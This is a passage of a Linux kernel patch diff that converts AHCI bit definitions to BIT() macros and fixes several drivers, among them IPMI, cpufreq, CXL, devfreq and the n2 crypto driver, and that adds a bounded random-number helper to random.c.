+-	PORT_IRQ_UNK_FIS	= (1 << 4), /* unknown FIS rx'd */
+-	PORT_IRQ_SDB_FIS	= (1 << 3), /* Set Device Bits FIS rx'd */
+-	PORT_IRQ_DMAS_FIS	= (1 << 2), /* DMA Setup FIS rx'd */
+-	PORT_IRQ_PIOS_FIS	= (1 << 1), /* PIO Setup FIS rx'd */
+-	PORT_IRQ_D2H_REG_FIS	= (1 << 0), /* D2H Register FIS rx'd */
++	PORT_IRQ_COLD_PRES	= BIT(31), /* cold presence detect */
++	PORT_IRQ_TF_ERR		= BIT(30), /* task file error */
++	PORT_IRQ_HBUS_ERR	= BIT(29), /* host bus fatal error */
++	PORT_IRQ_HBUS_DATA_ERR	= BIT(28), /* host bus data error */
++	PORT_IRQ_IF_ERR		= BIT(27), /* interface fatal error */
++	PORT_IRQ_IF_NONFATAL	= BIT(26), /* interface non-fatal error */
++	PORT_IRQ_OVERFLOW	= BIT(24), /* xfer exhausted available S/G */
++	PORT_IRQ_BAD_PMP	= BIT(23), /* incorrect port multiplier */
++
++	PORT_IRQ_PHYRDY		= BIT(22), /* PhyRdy changed */
++	PORT_IRQ_DMPS		= BIT(7),  /* mechanical presence status */
++	PORT_IRQ_CONNECT	= BIT(6),  /* port connect change status */
++	PORT_IRQ_SG_DONE	= BIT(5),  /* descriptor processed */
++	PORT_IRQ_UNK_FIS	= BIT(4),  /* unknown FIS rx'd */
++	PORT_IRQ_SDB_FIS	= BIT(3),  /* Set Device Bits FIS rx'd */
++	PORT_IRQ_DMAS_FIS	= BIT(2),  /* DMA Setup FIS rx'd */
++	PORT_IRQ_PIOS_FIS	= BIT(1),  /* PIO Setup FIS rx'd */
++	PORT_IRQ_D2H_REG_FIS	= BIT(0),  /* D2H Register FIS rx'd */
+ 
+ 	PORT_IRQ_FREEZE		= PORT_IRQ_HBUS_ERR |
+ 				  PORT_IRQ_IF_ERR |
+@@ -161,27 +162,27 @@ enum {
+ 				  PORT_IRQ_PIOS_FIS | PORT_IRQ_D2H_REG_FIS,
+ 
+ 	/* PORT_CMD bits */
+-	PORT_CMD_ASP		= (1 << 27), /* Aggressive Slumber/Partial */
+-	PORT_CMD_ALPE		= (1 << 26), /* Aggressive Link PM enable */
+-	PORT_CMD_ATAPI		= (1 << 24), /* Device is ATAPI */
+-	PORT_CMD_FBSCP		= (1 << 22), /* FBS Capable Port */
+-	PORT_CMD_ESP		= (1 << 21), /* External Sata Port */
+-	PORT_CMD_CPD		= (1 << 20), /* Cold Presence Detection */
+-	PORT_CMD_MPSP		= (1 << 19), /* Mechanical Presence Switch */
+-	PORT_CMD_HPCP		= (1 << 18), /* HotPlug Capable Port */
+-	PORT_CMD_PMP		= (1 << 17), /* PMP attached */
+-	PORT_CMD_LIST_ON	= (1 << 15), /* cmd list DMA engine running */
+-	PORT_CMD_FIS_ON		= (1 << 14), /* FIS DMA engine running */
+-	PORT_CMD_FIS_RX		= (1 << 4), /* Enable FIS receive DMA engine */
+-	PORT_CMD_CLO		= (1 << 3), /* Command list override */
+-	PORT_CMD_POWER_ON	= (1 << 2), /* Power up device */
+-	PORT_CMD_SPIN_UP	= (1 << 1), /* Spin up device */
+-	PORT_CMD_START		= (1 << 0), /* Enable port DMA engine */
+-
+-	PORT_CMD_ICC_MASK	= (0xf << 28), /* i/f ICC state mask */
+-	PORT_CMD_ICC_ACTIVE	= (0x1 << 28), /* Put i/f in active state */
+-	PORT_CMD_ICC_PARTIAL	= (0x2 << 28), /* Put i/f in partial state */
+-	PORT_CMD_ICC_SLUMBER	= (0x6 << 28), /* Put i/f in slumber state */
++	PORT_CMD_ASP		= BIT(27), /* Aggressive Slumber/Partial */
++	PORT_CMD_ALPE		= BIT(26), /* Aggressive Link PM enable */
++	PORT_CMD_ATAPI		= BIT(24), /* Device is ATAPI */
++	PORT_CMD_FBSCP		= BIT(22), /* FBS Capable Port */
++	PORT_CMD_ESP		= BIT(21), /* External Sata Port */
++	PORT_CMD_CPD		= BIT(20), /* Cold Presence Detection */
++	PORT_CMD_MPSP		= BIT(19), /* Mechanical Presence Switch */
++	PORT_CMD_HPCP		= BIT(18), /* HotPlug Capable Port */
++	PORT_CMD_PMP		= BIT(17), /* PMP attached */
++	PORT_CMD_LIST_ON	= BIT(15), /* cmd list DMA engine running */
++	PORT_CMD_FIS_ON		= BIT(14), /* FIS DMA engine running */
++	PORT_CMD_FIS_RX		= BIT(4),  /* Enable FIS receive DMA engine */
++	PORT_CMD_CLO		= BIT(3),  /* Command list override */
++	PORT_CMD_POWER_ON	= BIT(2),  /* Power up device */
++	PORT_CMD_SPIN_UP	= BIT(1),  /* Spin up device */
++	PORT_CMD_START		= BIT(0),  /* Enable port DMA engine */
++
++	PORT_CMD_ICC_MASK	= (0xfu << 28), /* i/f ICC state mask */
++	PORT_CMD_ICC_ACTIVE	= (0x1u << 28), /* Put i/f in active state */
++	PORT_CMD_ICC_PARTIAL	= (0x2u << 28), /* Put i/f in partial state */
++	PORT_CMD_ICC_SLUMBER	= (0x6u << 28), /* Put i/f in slumber state */
+ 
+ 	/* PORT_CMD capabilities mask */
+ 	PORT_CMD_CAP		= PORT_CMD_HPCP | PORT_CMD_MPSP |
+@@ -192,9 +193,9 @@ enum {
+ 	PORT_FBS_ADO_OFFSET	= 12, /* FBS active dev optimization offset */
+ 	PORT_FBS_DEV_OFFSET	= 8,  /* FBS device to issue offset */
+ 	PORT_FBS_DEV_MASK	= (0xf << PORT_FBS_DEV_OFFSET),  /* FBS.DEV */
+-	PORT_FBS_SDE		= (1 << 2), /* FBS single device error */
+-	PORT_FBS_DEC		= (1 << 1), /* FBS device error clear */
+-	PORT_FBS_EN		= (1 << 0), /* Enable FBS */
++	PORT_FBS_SDE		= BIT(2), /* FBS single device error */
++	PORT_FBS_DEC		= BIT(1), /* FBS device error clear */
++	PORT_FBS_EN		= BIT(0), /* Enable FBS */
+ 
+ 	/* PORT_DEVSLP bits */
+ 	PORT_DEVSLP_DM_OFFSET	= 25,             /* DITO multiplier offset */
+@@ -202,50 +203,50 @@ enum {
+ 	PORT_DEVSLP_DITO_OFFSET	= 15,             /* DITO offset */
+ 	PORT_DEVSLP_MDAT_OFFSET	= 10,             /* Minimum assertion time */
+ 	PORT_DEVSLP_DETO_OFFSET	= 2,              /* DevSlp exit timeout */
+-	PORT_DEVSLP_DSP		= (1 << 1),       /* DevSlp present */
+-	PORT_DEVSLP_ADSE	= (1 << 0),       /* Aggressive DevSlp enable */
++	PORT_DEVSLP_DSP		= BIT(1),         /* DevSlp present */
++	PORT_DEVSLP_ADSE	= BIT(0),         /* Aggressive DevSlp enable */
+ 
+ 	/* hpriv->flags bits */
+ 
+ #define AHCI_HFLAGS(flags)		.private_data	= (void *)(flags)
+ 
+-	AHCI_HFLAG_NO_NCQ		= (1 << 0),
+-	AHCI_HFLAG_IGN_IRQ_IF_ERR	= (1 << 1), /* ignore IRQ_IF_ERR */
+-	AHCI_HFLAG_IGN_SERR_INTERNAL	= (1 << 2), /* ignore SERR_INTERNAL */
+-	AHCI_HFLAG_32BIT_ONLY		= (1 << 3), /* force 32bit */
+-	AHCI_HFLAG_MV_PATA		= (1 << 4), /* PATA port */
+-	AHCI_HFLAG_NO_MSI		= (1 << 5), /* no PCI MSI */
+-	AHCI_HFLAG_NO_PMP		= (1 << 6), /* no PMP */
+-	AHCI_HFLAG_SECT255		= (1 << 8), /* max 255 sectors */
+-	AHCI_HFLAG_YES_NCQ		= (1 << 9), /* force NCQ cap on */
+-	AHCI_HFLAG_NO_SUSPEND		= (1 << 10), /* don't suspend */
+-	AHCI_HFLAG_SRST_TOUT_IS_OFFLINE	= (1 << 11), /* treat SRST timeout as
+-							link offline */
+-	AHCI_HFLAG_NO_SNTF		= (1 << 12), /* no sntf */
+-	AHCI_HFLAG_NO_FPDMA_AA		= (1 << 13), /* no FPDMA AA */
+-	AHCI_HFLAG_YES_FBS		= (1 << 14), /* force FBS cap on */
+-	AHCI_HFLAG_DELAY_ENGINE		= (1 << 15), /* do not start engine on
+-						        port start (wait until
+-						        error-handling stage) */
+-	AHCI_HFLAG_NO_DEVSLP		= (1 << 17), /* no device sleep */
+-	AHCI_HFLAG_NO_FBS		= (1 << 18), /* no FBS */
++	AHCI_HFLAG_NO_NCQ		= BIT(0),
++	AHCI_HFLAG_IGN_IRQ_IF_ERR	= BIT(1), /* ignore IRQ_IF_ERR */
++	AHCI_HFLAG_IGN_SERR_INTERNAL	= BIT(2), /* ignore SERR_INTERNAL */
++	AHCI_HFLAG_32BIT_ONLY		= BIT(3), /* force 32bit */
++	AHCI_HFLAG_MV_PATA		= BIT(4), /* PATA port */
++	AHCI_HFLAG_NO_MSI		= BIT(5), /* no PCI MSI */
++	AHCI_HFLAG_NO_PMP		= BIT(6), /* no PMP */
++	AHCI_HFLAG_SECT255		= BIT(8), /* max 255 sectors */
++	AHCI_HFLAG_YES_NCQ		= BIT(9), /* force NCQ cap on */
++	AHCI_HFLAG_NO_SUSPEND		= BIT(10), /* don't suspend */
++	AHCI_HFLAG_SRST_TOUT_IS_OFFLINE	= BIT(11), /* treat SRST timeout as
++						      link offline */
++	AHCI_HFLAG_NO_SNTF		= BIT(12), /* no sntf */
++	AHCI_HFLAG_NO_FPDMA_AA		= BIT(13), /* no FPDMA AA */
++	AHCI_HFLAG_YES_FBS		= BIT(14), /* force FBS cap on */
++	AHCI_HFLAG_DELAY_ENGINE		= BIT(15), /* do not start engine on
++						      port start (wait until
++						      error-handling stage) */
++	AHCI_HFLAG_NO_DEVSLP		= BIT(17), /* no device sleep */
++	AHCI_HFLAG_NO_FBS		= BIT(18), /* no FBS */
+ 
+ #ifdef CONFIG_PCI_MSI
+-	AHCI_HFLAG_MULTI_MSI		= (1 << 20), /* per-port MSI(-X) */
++	AHCI_HFLAG_MULTI_MSI		= BIT(20), /* per-port MSI(-X) */
+ #else
+ 	/* compile out MSI infrastructure */
+ 	AHCI_HFLAG_MULTI_MSI		= 0,
+ #endif
+-	AHCI_HFLAG_WAKE_BEFORE_STOP	= (1 << 22), /* wake before DMA stop */
+-	AHCI_HFLAG_YES_ALPM		= (1 << 23), /* force ALPM cap on */
+-	AHCI_HFLAG_NO_WRITE_TO_RO	= (1 << 24), /* don't write to read
+-							only registers */
+-	AHCI_HFLAG_USE_LPM_POLICY	= (1 << 25), /* chipset that should use
+-							SATA_MOBILE_LPM_POLICY
+-							as default lpm_policy */
+-	AHCI_HFLAG_SUSPEND_PHYS		= (1 << 26), /* handle PHYs during
+-							suspend/resume */
+-	AHCI_HFLAG_NO_SXS		= (1 << 28), /* SXS not supported */
++	AHCI_HFLAG_WAKE_BEFORE_STOP	= BIT(22), /* wake before DMA stop */
++	AHCI_HFLAG_YES_ALPM		= BIT(23), /* force ALPM cap on */
++	AHCI_HFLAG_NO_WRITE_TO_RO	= BIT(24), /* don't write to read
++						      only registers */
++	AHCI_HFLAG_USE_LPM_POLICY	= BIT(25), /* chipset that should use
++						      SATA_MOBILE_LPM_POLICY
++						      as default lpm_policy */
++	AHCI_HFLAG_SUSPEND_PHYS		= BIT(26), /* handle PHYs during
++						      suspend/resume */
++	AHCI_HFLAG_NO_SXS		= BIT(28), /* SXS not supported */
+ 
+ 	/* ap->flags bits */
+ 
+@@ -261,22 +262,22 @@ enum {
+ 	EM_MAX_RETRY			= 5,
+ 
+ 	/* em_ctl bits */
+-	EM_CTL_RST		= (1 << 9), /* Reset */
+-	EM_CTL_TM		= (1 << 8), /* Transmit Message */
+-	EM_CTL_MR		= (1 << 0), /* Message Received */
+-	EM_CTL_ALHD		= (1 << 26), /* Activity LED */
+-	EM_CTL_XMT		= (1 << 25), /* Transmit Only */
+-	EM_CTL_SMB		= (1 << 24), /* Single Message Buffer */
+-	EM_CTL_SGPIO		= (1 << 19), /* SGPIO messages supported */
+-	EM_CTL_SES		= (1 << 18), /* SES-2 messages supported */
+-	EM_CTL_SAFTE		= (1 << 17), /* SAF-TE messages supported */
+-	EM_CTL_LED		= (1 << 16), /* LED messages supported */
++	EM_CTL_RST		= BIT(9), /* Reset */
++	EM_CTL_TM		= BIT(8), /* Transmit Message */
++	EM_CTL_MR		= BIT(0), /* Message Received */
++	EM_CTL_ALHD		= BIT(26), /* Activity LED */
++	EM_CTL_XMT		= BIT(25), /* Transmit Only */
++	EM_CTL_SMB		= BIT(24), /* Single Message Buffer */
++	EM_CTL_SGPIO		= BIT(19), /* SGPIO messages supported */
++	EM_CTL_SES		= BIT(18), /* SES-2 messages supported */
++	EM_CTL_SAFTE		= BIT(17), /* SAF-TE messages supported */
++	EM_CTL_LED		= BIT(16), /* LED messages supported */
+ 
+ 	/* em message type */
+-	EM_MSG_TYPE_LED		= (1 << 0), /* LED */
+-	EM_MSG_TYPE_SAFTE	= (1 << 1), /* SAF-TE */
+-	EM_MSG_TYPE_SES2	= (1 << 2), /* SES-2 */
+-	EM_MSG_TYPE_SGPIO	= (1 << 3), /* SGPIO */
++	EM_MSG_TYPE_LED		= BIT(0), /* LED */
++	EM_MSG_TYPE_SAFTE	= BIT(1), /* SAF-TE */
++	EM_MSG_TYPE_SES2	= BIT(2), /* SES-2 */
++	EM_MSG_TYPE_SGPIO	= BIT(3), /* SGPIO */
+ };
+ 
+ struct ahci_cmd_hdr {
+diff --git a/drivers/base/dd.c b/drivers/base/dd.c
+index 3dda62503102f..9ae2b5c4fc496 100644
+--- a/drivers/base/dd.c
++++ b/drivers/base/dd.c
+@@ -1162,7 +1162,11 @@ static int __driver_attach(struct device *dev, void *data)
+ 		return 0;
+ 	} else if (ret < 0) {
+ 		dev_dbg(dev, "Bus failed to match device: %d\n", ret);
+-		return ret;
++		/*
++		 * Driver could not match with device, but may match with
++		 * another device on the bus.
++		 */
++		return 0;
+ 	} /* ret > 0 means positive match */
+ 
+ 	if (driver_allows_async_probing(drv)) {
+diff --git a/drivers/bus/mhi/host/pm.c b/drivers/bus/mhi/host/pm.c
+index 4a42186ff1112..083459028a4b8 100644
+--- a/drivers/bus/mhi/host/pm.c
++++ b/drivers/bus/mhi/host/pm.c
+@@ -301,7 +301,8 @@ int mhi_pm_m0_transition(struct mhi_controller *mhi_cntrl)
+ 		read_lock_irq(&mhi_chan->lock);
+ 
+ 		/* Only ring DB if ring is not empty */
+-		if (tre_ring->base && tre_ring->wp  != tre_ring->rp)
++		if (tre_ring->base && tre_ring->wp  != tre_ring->rp &&
++		    mhi_chan->ch_state == MHI_CH_STATE_ENABLED)
+ 			mhi_ring_chan_db(mhi_cntrl, mhi_chan);
+ 		read_unlock_irq(&mhi_chan->lock);
+ 	}
+diff --git a/drivers/char/ipmi/ipmi_msghandler.c b/drivers/char/ipmi/ipmi_msghandler.c
+index d5ee52be176d3..5d403fb5bd929 100644
+--- a/drivers/char/ipmi/ipmi_msghandler.c
++++ b/drivers/char/ipmi/ipmi_msghandler.c
+@@ -1330,6 +1330,7 @@ static void _ipmi_destroy_user(struct ipmi_user *user)
+ 	unsigned long    flags;
+ 	struct cmd_rcvr  *rcvr;
+ 	struct cmd_rcvr  *rcvrs = NULL;
++	struct module    *owner;
+ 
+ 	if (!acquire_ipmi_user(user, &i)) {
+ 		/*
+@@ -1392,8 +1393,9 @@ static void _ipmi_destroy_user(struct ipmi_user *user)
+ 		kfree(rcvr);
+ 	}
+ 
++	owner = intf->owner;
+ 	kref_put(&intf->refcount, intf_free);
+-	module_put(intf->owner);
++	module_put(owner);
+ }
+ 
+ int ipmi_destroy_user(struct ipmi_user *user)
+diff --git a/drivers/char/ipmi/ipmi_si_intf.c b/drivers/char/ipmi/ipmi_si_intf.c
+index 6e357ad76f2eb..abddd7e43a9a6 100644
+--- a/drivers/char/ipmi/ipmi_si_intf.c
++++ b/drivers/char/ipmi/ipmi_si_intf.c
+@@ -2153,6 +2153,20 @@ skip_fallback_noirq:
+ }
+ module_init(init_ipmi_si);
+ 
++static void wait_msg_processed(struct smi_info *smi_info)
++{
++	unsigned long jiffies_now;
++	long time_diff;
++
++	while (smi_info->curr_msg || (smi_info->si_state != SI_NORMAL)) {
++		jiffies_now = jiffies;
++		time_diff = (((long)jiffies_now - (long)smi_info->last_timeout_jiffies)
++		     * SI_USEC_PER_JIFFY);
++		smi_event_handler(smi_info, time_diff);
++		schedule_timeout_uninterruptible(1);
++	}
++}
++
+ static void shutdown_smi(void *send_info)
+ {
+ 	struct smi_info *smi_info = send_info;
+@@ -2187,16 +2201,13 @@ static void shutdown_smi(void *send_info)
+ 	 * in the BMC.  Note that timers and CPU interrupts are off,
+ 	 * so no need for locks.
+ 	 */
+-	while (smi_info->curr_msg || (smi_info->si_state != SI_NORMAL)) {
+-		poll(smi_info);
+-		schedule_timeout_uninterruptible(1);
+-	}
++	wait_msg_processed(smi_info);
++
+ 	if (smi_info->handlers)
+ 		disable_si_irq(smi_info);
+-	while (smi_info->curr_msg || (smi_info->si_state != SI_NORMAL)) {
+-		poll(smi_info);
+-		schedule_timeout_uninterruptible(1);
+-	}
++
++	wait_msg_processed(smi_info);
++
+ 	if (smi_info->handlers)
+ 		smi_info->handlers->cleanup(smi_info->si_sm);
+ 
+diff --git a/drivers/char/random.c b/drivers/char/random.c
+index 69754155300ea..f5868dddbb618 100644
+--- a/drivers/char/random.c
++++ b/drivers/char/random.c
+@@ -160,6 +160,9 @@ EXPORT_SYMBOL(wait_for_random_bytes);
+  *	u8 get_random_u8()
+  *	u16 get_random_u16()
+  *	u32 get_random_u32()
++ *	u32 get_random_u32_below(u32 ceil)
++ *	u32 get_random_u32_above(u32 floor)
++ *	u32 get_random_u32_inclusive(u32 floor, u32 ceil)
+  *	u64 get_random_u64()
+  *	unsigned long get_random_long()
+  *
+@@ -510,6 +513,41 @@ DEFINE_BATCHED_ENTROPY(u16)
+ DEFINE_BATCHED_ENTROPY(u32)
+ DEFINE_BATCHED_ENTROPY(u64)
+ 
++u32 __get_random_u32_below(u32 ceil)
++{
++	/*
++	 * This is the slow path for variable ceil. It is still fast, most of
++	 * the time, by doing traditional reciprocal multiplication and
++	 * opportunistically comparing the lower half to ceil itself, before
++	 * falling back to computing a larger bound, and then rejecting samples
++	 * whose lower half would indicate a range indivisible by ceil. The use
++	 * of `-ceil % ceil` is analogous to `2^32 % ceil`, but is computable
++	 * in 32-bits.
++	 */
++	u32 rand = get_random_u32();
++	u64 mult;
++
++	/*
++	 * This function is technically undefined for ceil == 0, and in fact
++	 * for the non-underscored constant version in the header, we build bug
++	 * on that. But for the non-constant case, it's convenient to have that
++	 * evaluate to being a straight call to get_random_u32(), so that
++	 * get_random_u32_inclusive() can work over its whole range without
++	 * undefined behavior.
++	 */
++	if (unlikely(!ceil))
++		return rand;
++
++	mult = (u64)ceil * rand;
++	if (unlikely((u32)mult < ceil)) {
++		u32 bound = -ceil % ceil;
++		while (unlikely((u32)mult < bound))
++			mult = (u64)ceil * get_random_u32();
++	}
++	return mult >> 32;
++}
++EXPORT_SYMBOL(__get_random_u32_below);
++
+ #ifdef CONFIG_SMP
+ /*
+  * This function is called when the CPU is coming up, with entry
+diff --git a/drivers/cpufreq/cpufreq.c b/drivers/cpufreq/cpufreq.c
+index 69b3d61852ac6..7e56a42750ea5 100644
+--- a/drivers/cpufreq/cpufreq.c
++++ b/drivers/cpufreq/cpufreq.c
+@@ -1207,6 +1207,7 @@ static struct cpufreq_policy *cpufreq_policy_alloc(unsigned int cpu)
+ 	if (!zalloc_cpumask_var(&policy->real_cpus, GFP_KERNEL))
+ 		goto err_free_rcpumask;
+ 
++	init_completion(&policy->kobj_unregister);
+ 	ret = kobject_init_and_add(&policy->kobj, &ktype_cpufreq,
+ 				   cpufreq_global_kobject, "policy%u", cpu);
+ 	if (ret) {
+@@ -1245,7 +1246,6 @@ static struct cpufreq_policy *cpufreq_policy_alloc(unsigned int cpu)
+ 	init_rwsem(&policy->rwsem);
+ 	spin_lock_init(&policy->transition_lock);
+ 	init_waitqueue_head(&policy->transition_wait);
+-	init_completion(&policy->kobj_unregister);
+ 	INIT_WORK(&policy->update, handle_update);
+ 
+ 	policy->cpu = cpu;
+diff --git a/drivers/crypto/Kconfig b/drivers/crypto/Kconfig
+index c30b5a39c2ac2..4a618d80e106f 100644
+--- a/drivers/crypto/Kconfig
++++ b/drivers/crypto/Kconfig
+@@ -790,8 +790,8 @@ config CRYPTO_DEV_CCREE
+ 	select CRYPTO_ECB
+ 	select CRYPTO_CTR
+ 	select CRYPTO_XTS
+-	select CRYPTO_SM4
+-	select CRYPTO_SM3
++	select CRYPTO_SM4_GENERIC
++	select CRYPTO_SM3_GENERIC
+ 	help
+ 	  Say 'Y' to enable a driver for the REE interface of the Arm
+ 	  TrustZone CryptoCell family of processors. Currently the
+diff --git a/drivers/crypto/ccp/sp-pci.c b/drivers/crypto/ccp/sp-pci.c
+index 792d6da7f0c07..084d052fddccb 100644
+--- a/drivers/crypto/ccp/sp-pci.c
++++ b/drivers/crypto/ccp/sp-pci.c
+@@ -381,6 +381,15 @@ static const struct psp_vdata pspv3 = {
+ 	.inten_reg		= 0x10690,
+ 	.intsts_reg		= 0x10694,
+ };
++
++static const struct psp_vdata pspv4 = {
++	.sev			= &sevv2,
++	.tee			= &teev1,
++	.feature_reg		= 0x109fc,
++	.inten_reg		= 0x10690,
++	.intsts_reg		= 0x10694,
++};
++
+ #endif
+ 
+ static const struct sp_dev_vdata dev_vdata[] = {
+@@ -426,7 +435,7 @@ static const struct sp_dev_vdata dev_vdata[] = {
+ 	{	/* 5 */
+ 		.bar = 2,
+ #ifdef CONFIG_CRYPTO_DEV_SP_PSP
+-		.psp_vdata = &pspv2,
++		.psp_vdata = &pspv4,
+ #endif
+ 	},
+ 	{	/* 6 */
+diff --git a/drivers/crypto/hisilicon/Kconfig b/drivers/crypto/hisilicon/Kconfig
+index 27e1fa9120639..743ce4fc3158c 100644
+--- a/drivers/crypto/hisilicon/Kconfig
++++ b/drivers/crypto/hisilicon/Kconfig
+@@ -26,7 +26,7 @@ config CRYPTO_DEV_HISI_SEC2
+ 	select CRYPTO_SHA1
+ 	select CRYPTO_SHA256
+ 	select CRYPTO_SHA512
+-	select CRYPTO_SM4
++	select CRYPTO_SM4_GENERIC
+ 	depends on PCI && PCI_MSI
+ 	depends on UACCE || UACCE=n
+ 	depends on ARM64 || (COMPILE_TEST && 64BIT)
+diff --git a/drivers/crypto/n2_core.c b/drivers/crypto/n2_core.c
+index 31e24df18877f..20d0dcd50344b 100644
+--- a/drivers/crypto/n2_core.c
++++ b/drivers/crypto/n2_core.c
+@@ -1229,6 +1229,7 @@ struct n2_hash_tmpl {
+ 	const u8	*hash_init;
+ 	u8		hw_op_hashsz;
+ 	u8		digest_size;
++	u8		statesize;
+ 	u8		block_size;
+ 	u8		auth_type;
+ 	u8		hmac_type;
+@@ -1260,6 +1261,7 @@ static const struct n2_hash_tmpl hash_tmpls[] = {
+ 	  .hmac_type	= AUTH_TYPE_HMAC_MD5,
+ 	  .hw_op_hashsz	= MD5_DIGEST_SIZE,
+ 	  .digest_size	= MD5_DIGEST_SIZE,
++	  .statesize	= sizeof(struct md5_state),
+ 	  .block_size	= MD5_HMAC_BLOCK_SIZE },
+ 	{ .name		= "sha1",
+ 	  .hash_zero	= sha1_zero_message_hash,
+@@ -1268,6 +1270,7 @@ static const struct n2_hash_tmpl hash_tmpls[] = {
+ 	  .hmac_type	= AUTH_TYPE_HMAC_SHA1,
+ 	  .hw_op_hashsz	= SHA1_DIGEST_SIZE,
+ 	  .digest_size	= SHA1_DIGEST_SIZE,
++	  .statesize	= sizeof(struct sha1_state),
+ 	  .block_size	= SHA1_BLOCK_SIZE },
+ 	{ .name		= "sha256",
+ 	  .hash_zero	= sha256_zero_message_hash,
+@@ -1276,6 +1279,7 @@ static const struct n2_hash_tmpl hash_tmpls[] = {
+ 	  .hmac_type	= AUTH_TYPE_HMAC_SHA256,
+ 	  .hw_op_hashsz	= SHA256_DIGEST_SIZE,
+ 	  .digest_size	= SHA256_DIGEST_SIZE,
++	  .statesize	= sizeof(struct sha256_state),
+ 	  .block_size	= SHA256_BLOCK_SIZE },
+ 	{ .name		= "sha224",
+ 	  .hash_zero	= sha224_zero_message_hash,
+@@ -1284,6 +1288,7 @@ static const struct n2_hash_tmpl hash_tmpls[] = {
+ 	  .hmac_type	= AUTH_TYPE_RESERVED,
+ 	  .hw_op_hashsz	= SHA256_DIGEST_SIZE,
+ 	  .digest_size	= SHA224_DIGEST_SIZE,
++	  .statesize	= sizeof(struct sha256_state),
+ 	  .block_size	= SHA224_BLOCK_SIZE },
+ };
+ #define NUM_HASH_TMPLS ARRAY_SIZE(hash_tmpls)
+@@ -1424,6 +1429,7 @@ static int __n2_register_one_ahash(const struct n2_hash_tmpl *tmpl)
+ 
+ 	halg = &ahash->halg;
+ 	halg->digestsize = tmpl->digest_size;
++	halg->statesize = tmpl->statesize;
+ 
+ 	base = &halg->base;
+ 	snprintf(base->cra_name, CRYPTO_MAX_ALG_NAME, "%s", tmpl->name);
+diff --git a/drivers/cxl/core/region.c b/drivers/cxl/core/region.c
+index f9ae5ad284ffb..c4f32c32dfd50 100644
+--- a/drivers/cxl/core/region.c
++++ b/drivers/cxl/core/region.c
+@@ -1226,7 +1226,7 @@ static int cxl_region_attach(struct cxl_region *cxlr,
+ 		struct cxl_endpoint_decoder *cxled_target;
+ 		struct cxl_memdev *cxlmd_target;
+ 
+-		cxled_target = p->targets[pos];
++		cxled_target = p->targets[i];
+ 		if (!cxled_target)
+ 			continue;
+ 
+@@ -1923,6 +1923,9 @@ static int cxl_region_probe(struct device *dev)
+ 	 */
+ 	up_read(&cxl_region_rwsem);
+ 
++	if (rc)
++		return rc;
++
+ 	switch (cxlr->mode) {
+ 	case CXL_DECODER_PMEM:
+ 		return devm_cxl_add_pmem_region(cxlr);
+diff --git a/drivers/devfreq/devfreq.c b/drivers/devfreq/devfreq.c
+index 63347a5ae5999..8c5f6f7fca112 100644
+--- a/drivers/devfreq/devfreq.c
++++ b/drivers/devfreq/devfreq.c
+@@ -776,8 +776,7 @@ static void remove_sysfs_files(struct devfreq *devfreq,
+  * @dev:	the device to add devfreq feature.
+  * @profile:	device-specific profile to run devfreq.
+  * @governor_name:	name of the policy to choose frequency.
+- * @data:	private data for the governor. The devfreq framework does not
+- *		touch this value.
++ * @data:	devfreq driver pass to governors, governor should not change it.
+  */
+ struct devfreq *devfreq_add_device(struct device *dev,
+ 				   struct devfreq_dev_profile *profile,
+@@ -1011,8 +1010,7 @@ static void devm_devfreq_dev_release(struct device *dev, void *res)
+  * @dev:	the device to add devfreq feature.
+  * @profile:	device-specific profile to run devfreq.
+  * @governor_name:	name of the policy to choose frequency.
+- * @data:	private data for the governor. The devfreq framework does not
+- *		touch this value.
++ * @data:	 devfreq driver pass to governors, governor should not change it.
+  *
+  * This function manages automatically the memory of devfreq device using device
+  * resource management and simplify the free operation for memory of devfreq
+diff --git a/drivers/devfreq/governor_userspace.c b/drivers/devfreq/governor_userspace.c
+index ab9db7adb3ade..d69672ccacc49 100644
+--- a/drivers/devfreq/governor_userspace.c
++++ b/drivers/devfreq/governor_userspace.c
+@@ -21,7 +21,7 @@ struct userspace_data {
+ 
+ static int devfreq_userspace_func(struct devfreq *df, unsigned long *freq)
+ {
+-	struct userspace_data *data = df->data;
++	struct userspace_data *data = df->governor_data;
+ 
+ 	if (data->valid)
+ 		*freq = data->user_frequency;
+@@ -40,7 +40,7 @@ static ssize_t set_freq_store(struct device *dev, struct device_attribute *attr,
+ 	int err = 0;
+ 
+ 	mutex_lock(&devfreq->lock);
+-	data = devfreq->data;
++	data = devfreq->governor_data;
+ 
+ 	sscanf(buf, "%lu", &wanted);
+ 	data->user_frequency = wanted;
+@@ -60,7 +60,7 @@ static ssize_t set_freq_show(struct device *dev,
+ 	int err = 0;
+ 
+ 	mutex_lock(&devfreq->lock);
+-	data = devfreq->data;
++	data = devfreq->governor_data;
+ 
+ 	if (data->valid)
+ 		err = sprintf(buf, "%lu\n", data->user_frequency);
+@@ -91,7 +91,7 @@ static int userspace_init(struct devfreq *devfreq)
+ 		goto out;
+ 	}
+ 	data->valid = false;
+-	devfreq->data = data;
++	devfreq->governor_data = data;
+ 
+ 	err = sysfs_create_group(&devfreq->dev.kobj, &dev_attr_group);
+ out:
+@@ -107,8 +107,8 @@ static void userspace_exit(struct devfreq *devfreq)
+ 	if (devfreq->dev.kobj.sd)
+ 		sysfs_remove_group(&devfreq->dev.kobj, &dev_attr_group);
+ 
+-	kfree(devfreq->data);
+-	devfreq->data = NULL;
++	kfree(devfreq->governor_data);
++	devfreq->governor_data = NULL;
+ }
+ 
+ static int devfreq_userspace_handler(struct devfreq *devfreq,
+diff --git a/drivers/edac/edac_mc_sysfs.c b/drivers/edac/edac_mc_sysfs.c
+index 0a638c97702a5..15f63452a9bec 100644
+--- a/drivers/edac/edac_mc_sysfs.c
++++ b/drivers/edac/edac_mc_sysfs.c
+@@ -298,6 +298,14 @@ DEVICE_CHANNEL(ch6_dimm_label, S_IRUGO | S_IWUSR,
+ 	channel_dimm_label_show, channel_dimm_label_store, 6);
+ DEVICE_CHANNEL(ch7_dimm_label, S_IRUGO | S_IWUSR,
+ 	channel_dimm_label_show, channel_dimm_label_store, 7);
++DEVICE_CHANNEL(ch8_dimm_label, S_IRUGO | S_IWUSR,
++	channel_dimm_label_show, channel_dimm_label_store, 8);
++DEVICE_CHANNEL(ch9_dimm_label, S_IRUGO | S_IWUSR,
++	channel_dimm_label_show, channel_dimm_label_store, 9);
++DEVICE_CHANNEL(ch10_dimm_label, S_IRUGO | S_IWUSR,
++	channel_dimm_label_show, channel_dimm_label_store, 10);
++DEVICE_CHANNEL(ch11_dimm_label, S_IRUGO | S_IWUSR,
++	channel_dimm_label_show, channel_dimm_label_store, 11);
+ 
